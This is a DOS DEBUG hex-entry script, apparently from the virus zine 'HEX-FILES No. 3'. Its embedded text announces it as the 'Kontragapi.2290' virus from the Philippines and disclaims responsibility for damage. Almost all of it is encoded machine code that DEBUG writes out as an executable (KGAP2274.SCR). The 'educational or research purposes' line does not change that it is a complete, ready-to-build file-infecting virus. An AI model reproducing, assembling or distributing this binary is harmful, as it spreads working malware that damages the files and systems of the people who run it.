E 0100 E9 CF 01 0D 20 20 20 0D 0A 4D 61 62 75 68 61 79
E 0110 21 0D 0A 0A 54 68 69 73 20 69 73 20 4B 6F 6E 74
E 0120 72 61 67 61 70 69 2E 32 32 39 30 20 76 69 72 75
E 0130 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75 20
E 0140 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69 70 70
E 0150 69 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20 74
E 0160 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48 45
E 0170 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 33 0D 0A 0A
E 0180 48 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50 75
E 0190 74 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61 72
E 01A0 65 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62 6C
E 01B0 65 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69 6D
E 01C0 70 6C 69 65 64 0D 0A 61 6E 64 2F 6F 72 20 69 6D
E 01D0 61 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20 61
E 01E0 72 69 73 69 6E 67 20 64 69 72 65 63 74 6C 79 20
E 01F0 6F 72 20 69 6E 64 69 72 65 63 74 6C 79 20 66 72
E 0200 6F 6D 20 74 68 65 20 75 73 65 2C 20 6D 69 73 75
E 0210 73 65 0D 0A 6F 72 20 6E 6F 6E 2D 75 73 65 20 6F
E 0220 66 20 74 68 69 73 20 70 72 6F 67 72 61 6D 2E 20
E 0230 54 68 65 20 70 65 72 73 6F 6E 20 77 68 6F 20 65
E 0240 78 65 63 75 74 65 73 20 74 68 69 73 20 70 72 6F
E 0250 67 72 61 6D 20 62 65 61 72 73 20 66 75 6C 6C 0D
E 0260 0A 72 65 73 70 6F 6E 73 69 62 69 6C 69 74 79 20
E 0270 66 6F 72 20 68 69 73 2F 68 65 72 20 61 63 74 69
E 0280 6F 6E 73 2E 0D 0A 0A 54 68 69 73 20 70 72 6F 67
E 0290 72 61 6D 20 69 73 20 73 74 72 69 63 74 6C 79 20
E 02A0 66 6F 72 20 65 64 75 63 61 74 69 6F 6E 61 6C 20
E 02B0 6F 72 20 72 65 73 65 61 72 63 68 20 70 75 72 70
E 02C0 6F 73 65 73 20 6F 6E 6C 79 2E 0D 0A 0A 0A 24 08
E 02D0 20 1A 0E 1F BA 07 01 B4 09 E9 D6 0A C0 75 00 B4
E 02E0 4C CD 21
E 04D2 BC 15 D6 11 E2 6F 49 73 50 77 3F 6C 41 75
E 04E0 4B 12 EE 28 00 38 A8 93 C2 A5 58 09 12 06 64 0C
E 04F0 4C 13 13 B9 FF D1 19 B9 46 D2 1D C1 D0 09 58 99
E 0500 2D E5 98 55 87 01 BA 12 6A 23 12 23 15 41 7C 79
E 0510 14 90 06 92 F3 ED F4 08 02 C9 1F ED 65 08 AB DB
E 0520 B0 E2 0C 5C 29 77 75 13 49 57 14 77 31 79 74 C4
E 0530 50 05 37 03 C1 E4 F6 FC 3D B2 75 0A B2 51 ED 3E
E 0540 47 79 8B 90 4A 3E 4D 79 8B BD 7A 05 95 3D 55 79
E 0550 56 3D 79 7A 4D B3 91 4A 58 7A 8B 38 27 91 5B B2
E 0560 6C C5 D8 14 F0 CD 14 B4 DE 11 A4 32 E3 FE B9 08
E 0570 63 F1 5E 5E 61 38 C8 56 D0 5C C5 79 88 B1 2E 7A
E 0580 7B 65 E2 5E DE F0 68 89 4E 0E E6 93 6B EE 97 08
E 0590 04 1C 7C 31 99 77 A9 13 B9 BF 9C 05 57 2F A0 ED
E 05A0 70 08 8C B8 A8 ED 74 08 02 60 CB ED 6A 08 0A 25
E 05B0 9A BB B6 0C D5 66 A3 26 56 56 46 CA FA 1E 34 44
E 05C0 FE 40 38 40 02 30 3C 20 06 43 40 19 0A 49 44 15
E 05D0 0E 5C 48 11 12 51 4C 0D 32 34 7F 2C DF F0 F0 EE
E 05E0 08 05 65 00 7E 1E 5D F6 E8 CC 44 A3 9E 06 BF BE
E 05F0 03 06 44 BE EE 46 48 BE D0 46 CB A2 E9 E1 60 24
E 0600 08 EE F4 08 14 0D 93 CA 37 0E 0C 91 F6 9A 60 38
E 0610 E4 8E 6A 0D CA 3C 00 58 1C FD FF FD FF 11 F2 7B
E 0620 27 43 04 15 98 64 10 43 2C EE 78 08 A0 5C 18 74
E 0630 34 7A 80 91 7A 24 71 4A 60 7B 43 91 82 26 7A CA
E 0640 B6 43 CF 4A 60 8F 8E 08 87 26 3D 7A 80 EE DE 08
E 0650 DF 5A 72 EE 97 08 CA 1C 42 6C 5E 78 67 EE 98 06
E 0660 4A 18 66 93 BA 24 9A F3 F4 52 81 EE 99 08 C8 60
E 0670 91 EE 6A 08 84 25 28 07 00 4D 83 10 3E 7B 85 EE
E 0680 82 08 F7 B0 DE 91 68 61 A9 EE 68 08 95 25 F1 EF
E 0690 D8 05 95 2F C7 09 C3 39 CD C6 24 4D A4 8F E6 0A
E 06A0 2B 4D A4 A9 ED 0E F0 4E 4D 21 B4 EE 86 08 EB C7
E 06B0 27 14 35 45 A4 18 05 61 2E 0C A4 4A C0 79 C6 CC
E 06C0 08 0E 28 00 89 92 8E 34 B8 18 4C 85 D4 06 45 0C
E 06D0 0F 0F D4 7C C0 0A 1E 0B 7D 51 E4 98 C6 B8 E1 97
E 06E0 6D DD A3 F2 E9 AB 8C 92 E4 B7 D5 B1 79 4D F2 91
E 06F0 E2 05 B8 AA 1D 0F 9B 31 FA 56 92 32 BF 0C DD 0F
E 0700 AD C0 07 07 EE 70 09 61 C9 C7 0D 3A 04 96 EE A8
E 0710 7E 0B 38 0E 52 0C 8E 0F A4 CB 40 0E 5A 0C 97 F6
E 0720 BA 15 43 0A 1E 99 B2 0C AA 00 2E 7D 32 BB 10 F3
E 0730 34 BB F8 AA 64 07 B8 00 3D 7A 3F 8A 05 0B C0 00
E 0740 47 7B 58 87 3F 0A BC 14 CA 00 4F 7B 52 11 19 7D
E 0750 55 4E 3F 09 A5 91 5D A9 FD 09 47 08 E9 C9 1F 14
E 0760 6B C0 D4 0B 69 C8 6B C8 0D 3C 6C 5A C5 5C C2 C4
E 0770 74 07 77 DC 23 0B 3A B3 C3 7C 73 62 7C D6 68 17
E 0780 83 C5 AD 07 B9 F4 DF 92 61 F0 FC 0A 76 75 93 AB
E 0790 37 F0 FC 0A 21 CF C3 C9 D7 39 9C 79 92 2D 9E 07
E 07A0 A3 0D D8 07 FD AB ED EF FC 0A 50 F0 FC 0A 55 F0
E 07B0 FC 0A 58 F0 FC 0A 5C 55 A2 49 BF 91 C3 2B C7 43
E 07C0 C6 7C C5 47 D2 5F 72 F0 FC 0A 71 AD 1B F0 FC 0A
E 07D0 17 61 25 93 9D 33 99 12 BE 7D EF 43 5B 7F EF 0B
E 07E0 E4 FD BC 92 C6 B8 5D B3 D2 19 EF 5F D9 50 7B FF
E 07F0 A1 F0 FC 0A A6 F1 A2 62 85 CF 27 CA 3E 48 F7 E0
E 0800 AD 93 DB F0 FC 0A 93 CF 35 CE 48 59 84 28 9B CA
E 0810 3D CE 6D 5F 42 0A A2 E8 CA 7C A5 0C A9 02 D0 F1
E 0820 CC 93 EB 33 E7 0D F1 08 21 E1 D7 67 19 1F 5C 0A
E 0830 BC E8 E4 7C BF 0C E8 F1 E4 61 C7 CF 69 C9 45 D1
E 0840 42 FF 1C B4 2E BE 4A F0 FC 0A 34 B8 50 65 AA 63
E 0850 DD D7 7F D2 3E 22 58 C6 3A 11 E7 5C 76 93 AC 1E
E 0860 1A 0A BB F3 6B C2 48 11 1E 23 08 17 56 95 6D CC
E 0870 26 49 5F FF 2A 47 63 FB 34 2D 82 C1 A5 08 34 57
E 0880 6D F1 38 58 71 ED 3C 48 43 09 8E C2 7C 1A 7B E3
E 0890 C5 D1 4C 09 D8 F3 6B 3C 63 C1 9D 4B 89 D5 5E E9
E 08A0 AA 92 F8 20 30 4D BE 92 72 BF CB 2A 84 2B 7E 53
E 08B0 EC D2 28 11 DA E8 C2 CA 42 4D D2 4A 81 D6 E1 12
E 08C0 7A 0B 01 F1 6A 08 53 E1 8D 4F F9 5C 10 4A 26 0C
E 08D0 28 52 26 0D 29 4C 19 57 DE 53 25 55 2A 09 3F C1
E 08E0 06 3E CC 8E E5 0F 3B BD 0F C3 06 0A 3E F1 6A 08
E 08F0 00 10 F3 F0 55 BD 27 F1 6A 08 02 5C 0C 28 FF F0
E 0900 8D FB 07 D9 50 53 93 0D 46 F4 81 1D 98 CD A8 F4
E 0910 32 59 89 7D 85 74 8B 6A 3A 54 7D 80 7F 82 81 77
E 0920 5E F2 98 12 62 F1 9D 79 AD 37 46 11 30 94 74 0A
E 0930 72 49 74 7D 50 94 8E 0D 3D D9 24 5D 3D 93 86 0D
E 0940 E5 50 4C F1 86 08 BA 11 D2 77 52 44 0F 7E 01 03
E 0950 15 0D 1A 95 46 37 46 1B CC 0D 97 FB D0 26 EB 5F
E 0960 66 0C 34 F2 90 08 F1 4F 6E 92 BA 09 56 21 6F 7C
E 0970 51 15 34 7E 50 95 6A 0D 4A 54 C6 94 82 45 6B 7F
E 0980 87 93 48 A2 71 16 C4 F2 FE 0D C8 F1 03 14 1B 4E
E 0990 93 49 D4 49 0A C3 83 C3 59 F7 A1 C2 B5 09 92 B8
E 09A0 17 0F 5C 0B A6 F4 52 46 E7 80 CA 45 BD 7D 51 5A
E 09B0 D6 15 F0 15 2A 0C F4 0D 12 7F C5 2D BF 7D 84 C2
E 09C0 C5 09 AF 97 AE 19 C9 F4 52 46 0C 7C 3A 46 31 80
E 09D0 A3 46 54 7C 3A 46 5B 81 E7 59 C4 03 DE 62 63 EB
E 09E0 E5 52 58 B8 D1 B7 24 92 5C 59 28 98 64 E0 2C 9A
E 09F1 51 30 A3 6C B6 34 AA 6C 49 38 AD 74 CB 3C B2
E 0A00 74 41 40 B3 7C BF 44 BA 7C 39 48 C9 85 1C 4C BE
E 0A10 86 0E 50 C2 8B 0D A1 80 1A 2E 24 7F C0 F3 83 09
E 0A20 18 CF 5C 7F 2E 46 EE 7C 3A 46 F3 80 DA 46 FD 7E
E 0A30 3C 46 04 7D 3A 46 0B 81 C5 02 FF 94 02 47 50 7E
E 0A40 BA 46 55 7E BA 46 5A 7E BA 46 62 7E BA 46 70 7E
E 0A50 B8 46 7B 7E B8 46 79 7F 3A 96 DA 0A 69 09 D4 E3
E 0A60 EC 0F EF D8 91 D9 EB 03 79 81 3A 47 22 7F 71 51
E 0A70 B9 94 79 46 C2 7E B8 46 AB 7E B8 46 87 7E B9 46
E 0A80 90 7E B9 46 95 7E B9 46 A0 7E B9 46 A8 7E B9 46
E 0A90 B7 7E B9 46 C4 7E B9 46 CD 7E B9 46 D9 7E B9 46
E 0AA0 DE 7E B9 46 E3 7E B9 46 ED 7E B9 46 F6 7E B9 46
E 0AB0 1E 7F B9 14 76 80 BA 03 7D C3 BE 0A A7 9D BE 11
E 0AC0 C9 18 DA 21 E4 29 EE 31 F8 39 02 42 0C A7 6D 00
E 0AD0 CA 04 CE 06 D2 08 62 CF FE D1 18 11 52 1B 04 CB
E 0AE0 56 0F 20 CB 5B 0F A0 0D EA CD 28 8B 63 0F A8 0F
E 0AF0 F2 CD AC 0E F6 CD 22 39 3D 5A 49 0B 89 EA 8B 0C
E 0B00 0D F8 7C 52 AE 0C 7D 3B B2 0D 81 3C B6 0F 85 5F
E 0B10 BA 13 89 39 BE 1B 8D 2B C2 2B 91 2C C6 4B 95 4F
E 0B20 CA 8B 99 29 1C D0 29 80 65 01 F0 0D A3 1A 26 D0
E 0B30 36 80 43 01 FA 13 AC 1A 22 C3 3C F6 46 F3 58 0C
E 0B40 2D 0F 2C 65 47 96 49 16 37 81 56 01 12 1C C4 10
E 0B50 3A A3 54 F6 74 01 1C 2C CF 1A 52 D0 9E 80 71 01
E 0B60 26 8C D8 1A 4E F6 68 F6 74 F3 7C 0C 59 11 5B 9A
E 0B70 5A 3A 74 96 7B B4 88 1B EE 0E 64 43 7E 09 86 BB
E 0B80 88 BB 84 47 8C 82 98 2F 8B 80 6F A4 1C E4 30 78
E 0B90 96 19 B3 2F 97 80 6F 3E 5A AE 4C 12 D9 EA 13 D5
E 0BA0 65 F4 C7 0C B2 D1 52 F4 CE 0C 6C F4 B1 17 70 B6
E 0BB0 BC F8 9F 67 41 11 DC 1A 2E 14 F8 0F 32 10 FC 13
E 0BC0 37 29 CF F8 3A 29 52 D0 EE 1A 08 12 44 10 FC 12
E 0BD0 BD 04 10 0F 4A 19 DC 9C E5 F8 50 6E 88 F7 3F 48
E 0BE0 EE 7F C7 18 96 B6 0C 14 D5 31 D4 E6 EE 17 90 B6
E 0BF0 DD 2B 7F 11 46 31 28 0D 8B 64 07 F9 73 22 24 1A
E 0C00 3E 18 78 10 42 10 7D 18 14 D1 16 CD B8 B4 11 80
E 0C10 13 53 5B CF 3A 16 8C 10 56 14 91 0E 22 0E 2A D1
E 0C20 2C CD CE F4 CE 0C B2 D0 4E D3 68 12 A3 11 3A CD
E 0C30 DC F7 12 8D 1A 14 42 D8 5E CC B1 10 48 CD EA CF
E 0C40 7E CC B8 04 82 4C BD F2 54 CD F6 96 53 30 CF B6
E 0C50 15 F5 C7 0C 62 96 43 D7 E5 11 80 0F E8 F4 6C 8C
E 0C60 0C F5 CE 0C F0 D0 8C 04 76 CC 2C F6 71 16 31 B7
E 0C70 68 D2 75 80 13 8D 75 10 EE DD 67 A2 66 55 80 18
E 0C80 0A B7 6C 56 86 96 4C 31 91 80 94 48 92 81 99 16
E 0C90 7F 82 98 17 83 81 99 4C A4 CD A8 CC 48 D0 2B 12
E 0CA0 C6 0F 2E F5 8E 34 A8 BD AD DE 94 8D 92 14 30 09
E 0CB0 B8 81 B7 8C 82 0E 8A F1 C6 CC C6 EC 6E DD CA D1
E 0CC0 6A 0E 39 0E 71 B8 8B 98 CF 30 CD 96 B6 D0 5A D1
E 0CD0 83 10 A6 F5 FA 13 4C 16 16 11 51 17 D4 D2 E1 81
E 0CE0 E6 17 D1 81 E7 4C BA ED 74 D5 AF C9 EC 0C AA A5
E 0CF0 0A 1B 13 C1 20 DA 19 09 B8 DF 00 C6 FE 0D 81 07
E 0D00 9A 26 78 21 91 06 C1 EB 12 00 B0 CC 92 0D 9C CD
E 0D10 17 1D 14 5D 7E 65 20 D8 D2 DF 1D CC F7 0E A1 D3
E 0D20 0D 11 27 06 CB B1 2B CE 29 EE 32 C1 78 C8 BF 0E
E 0D30 FF 2E 67 CD C4 E5 FC 12 F5 F3 3C 96 5B 99 8D 0F
E 0D40 50 2C E7 2F 47 99 4E 2B 4B 6A DA EA 5C 14 0F EC
E 0D50 5A 98 33 AF 82 0D A8 B8 12 8E 5C B8 F3 B8 F5 39
E 0D60 86 B8 F9 B8 FB 11 78 B8 FF B8 C6 98 30 41 6F 56
E 0D70 00 CE 9A 98 C3 10 39 EF 7E 9B 3E 99 45 00 2E 83
E 0D80 9C BB F9 06 35 14 A7 1B 91 98 63 C6 8E 58 78 E7
E 0D90 8C 1C AB C9 86 25 4C 5B 82 DD 96 5E AC 2C 41 EC
E 0DA0 AA 9B 64 C2 EF F5 6A 08 02 C8 3B 0F 62 3F 7D 2F
E 0DB0 12 1D 23 79 0E A1 BA 07 B1 B4 81 ED D6 0A A0 75
E 0DC0 00 B4 4C BC D2 04 24 64 88 E4 24 64 A0 64 64 24
E 0DD1 8A 64 64 24 64 8A 64 64 8A 64 64 80 E4 64 A0
E 0DE2 80 E4 64 58 8A 6C 64 94 22 6C 64 2B E0 D0
E 0DF0 E5 D0 E5 88 ED 94 8A 6C 64 50 24 64 5D 80 E4
E 0E00 A0 64 64 81 FC E4 0D 88 ED 75 DA 24 64 E9 DB FE
E 0E10 8A 64 64 8A 64 64 D0 E4 D0 E4 C6 C4
RCX
0D1D
W
Q
ÄÄ KGAP2274.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-=<HF3>=-
